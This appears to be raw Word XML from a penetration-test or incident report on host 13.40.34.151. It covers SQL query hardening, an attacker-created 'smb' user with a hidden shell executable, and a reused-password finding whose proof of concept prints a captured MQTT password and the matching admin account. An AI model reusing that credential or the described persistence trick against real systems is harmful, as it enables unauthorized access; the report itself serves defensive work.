          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="181B744A" w14:textId="4DEF258A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1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>
              <w:br/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BB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$sql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 xml:space="preserve">= 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D0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"SELECT * FROM users WHERE password=? AND username=?"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>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="020C8A21" w:rsidP="57C4D39E" w:rsidRDefault="020C8A21" w14:paraId="6A6BF31F" w14:textId="49B68DEC">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:noProof w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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BB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$query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 xml:space="preserve">= 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BB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$conn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>-&gt;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BB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>prepare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>(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BB"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$sql</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="020C8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  <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="6BC3DFAE" w14:textId="10D27C51">
            <w:pPr>
              <w:pStyle w:val="Normal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700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="43DD9DF7" w:rsidP="57C4D39E" w:rsidRDefault="43DD9DF7" w14:paraId="39BAE0B4" w14:textId="4B0CF5EE">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1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57C4D39E" w:rsidR="43DD9DF7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Item 3</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="43DD9DF7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: Change password hashing algorithm from MD5 </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="5B83C8D5">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">to </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="5B83C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32629"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SHA-512 with salt. MD5 is not considered secure anymore</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="5A413B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32629"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and can be cracked relatively easily.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6ED35D6C" w14:textId="06A26E2E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="25F37688" w14:textId="4A72577E">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="199F8AB2">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Creating users – 13.40.34.151 (</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="25D34382">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="199F8AB2">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="26F57712" w14:textId="573CD661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35AE731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0EFC3C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604AB6FD" w:rsidP="57C4D39E" w:rsidRDefault="604AB6FD" w14:paraId="2C084C46" w14:textId="444136B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i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="604AB6FD">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">Creating user </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="604AB6FD">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>smb</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="604AB6FD">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="09858B7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8FE502A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4E41FA65" w:rsidP="57C4D39E" w:rsidRDefault="4E41FA65" w14:paraId="7AF52173" w14:textId="2371AAB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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4E41FA65">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="5DBCC337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3FCCDAF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A91F00F" w14:textId="753FB73B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331227C2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42CAC25" w14:textId="22CD9C87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57C4D39E">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location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BA203D2" w14:textId="497C146E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="31304C18">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="31304C18">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="298D3BD6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B7D2AB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696E9AE5" w:rsidP="57C4D39E" w:rsidRDefault="696E9AE5" w14:noSpellErr="1" w14:paraId="608A89B0" w14:textId="422E3C5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="696E9AE5">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1136/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="74FD5998" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="5C79333C" w14:textId="573CD661">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="199F8AB2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63473480" w14:textId="29637135">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0741A5A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers created a Linux user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0741A5A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0741A5A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0741A5A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The name of the user is purposefully misleading, as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0741A5A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0741A5A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0741A5A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is also a </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="57C76E1F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>valid Linux Server Message Block protocol program.</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0741A5A8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="4746E74D" w14:textId="646345B0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0BA10B85">
        <w:drawing>
          <wp:inline wp14:editId="4BEF03CD" wp14:anchorId="7ACC4418">
            <wp:extent cx="4572000" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="420438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af620ca9e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3DDE59AC" w14:textId="3BA42FA3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="58A4FF73">
        <w:rPr/>
        <w:t xml:space="preserve">The attackers have also included an executable file </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2889791F">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/home/smb/.locale/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2889791F">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>creanme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="2889791F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="58A4FF73">
        <w:rPr/>
        <w:t>that prompts shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="65D7D929" w14:textId="0BB8049A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="7CD77CE1">
        <w:drawing>
          <wp:inline wp14:editId="4BD1F70E" wp14:anchorId="1B19D20A">
            <wp:extent cx="2047875" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1273042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0edc5153c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265D93AB" w14:textId="08DCF39C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="346E7C4F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows attackers to </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="7ED4892E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>persist on</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="346E7C4F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="346E7C4F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="24A36A1E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and execute commands </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="346E7C4F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">while looking </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="36D66A0E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="346E7C4F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a regular program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6C274D8E" w14:textId="573CD661">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="199F8AB2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464462E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34421A0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67FC56A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534F48A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64E2F7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2E14D38" w14:textId="18F57331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007EF47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1F639ED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9E1FDB4" w14:textId="27E946AA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:i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380CDB84">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="380CDB84">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="380CDB84">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> from system users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="4B6C46BE" w14:textId="79A6C219">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="60545FD6" w14:textId="108D13F0">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="73859210">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Reused password – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="73859210">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">13.40.34.151 </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="73859210">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1A97E640">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="73859210">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="42E4749B" w14:textId="03D8C509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62EFDDD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7E6139A7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231D0DE5" w:rsidP="57C4D39E" w:rsidRDefault="231D0DE5" w14:paraId="42F168C5" w14:textId="2C8595E6">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="231D0DE5">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Password for MQTT broker is the same as password for user: johnsysadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="41075123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89FE7B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66841C5A" w:rsidP="57C4D39E" w:rsidRDefault="66841C5A" w14:paraId="22B6C8D1" w14:textId="48196ED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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="66841C5A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="017832BB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AC3EEEC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6C1A3DE" w14:textId="237B101A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0B35F8A3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B780EBD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0B165377" w:rsidP="57C4D39E" w:rsidRDefault="0B165377" w14:noSpellErr="1" w14:paraId="4C31F43E" w14:textId="2A0A5431">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="0B165377">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/mitigations/M1027/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="0A14F69A" w14:textId="2C0C7D1F">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="2D369444" w14:textId="6D490E37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="73859210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5371659B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="127143E4" w14:textId="643842AB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5604334E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>From MQTT traffic it is possible to capture that password for MQTT broker</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5604334E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2817BB65">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(the password is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5604334E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>eL_Administrador_dE_SisteMaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0903F6E6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="75BC9CDD" w14:textId="458A9594">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5604334E">
        <w:drawing>
          <wp:inline wp14:editId="65C5B9DB" wp14:anchorId="68D56699">
            <wp:extent cx="4949164" cy="2020909"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124871140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75254234a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64" cy="20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16404D1F" w14:textId="64FA1704">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="5604334E">
        <w:rPr/>
        <w:t>Same</w:t>
      </w:r>
      <w:r w:rsidR="5604334E">
        <w:rPr/>
        <w:t xml:space="preserve"> password is used on the machine with IP address: 13.40.34.151 on the user: </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="5604334E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:r w:rsidR="5604334E">
        <w:rPr/>
        <w:t xml:space="preserve">. By reusing the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="5604334E">
        <w:rPr/>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0BD77597">
        <w:rPr/>
        <w:t xml:space="preserve"> it is possible to elevate privileges and obtain root user on </w:t>
      </w:r>
      <w:r w:rsidR="7AECD67E">
        <w:rPr/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0BD77597">
        <w:rPr/>
        <w:t xml:space="preserve">compromised </w:t>
      </w:r>
      <w:r w:rsidR="7001A8E5">
        <w:rPr/>
        <w:t>system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="36813338" w14:textId="31751ED5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2EAEEDFC">
        <w:drawing>
          <wp:inline wp14:editId="58F36EED" wp14:anchorId="18154934">
            <wp:extent cx="4572000" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11686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dc598ca2b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1B3AD036" w14:textId="7CAA6731">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="73859210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3A731863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6B6D4B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3A40688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5137CC41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71DDC28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1ABB449" w14:textId="279F23E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6F9F0F26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84065E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5DA33D6" w14:textId="1D967F3F">
            <w:pPr>
              <w:pStyle w:val="Normal"/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</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>: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19B61423">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Do</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="19B61423">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> not reuse administrator account </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="2F565631">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">across systems. </w:t>
            </w:r>
          </w:p>
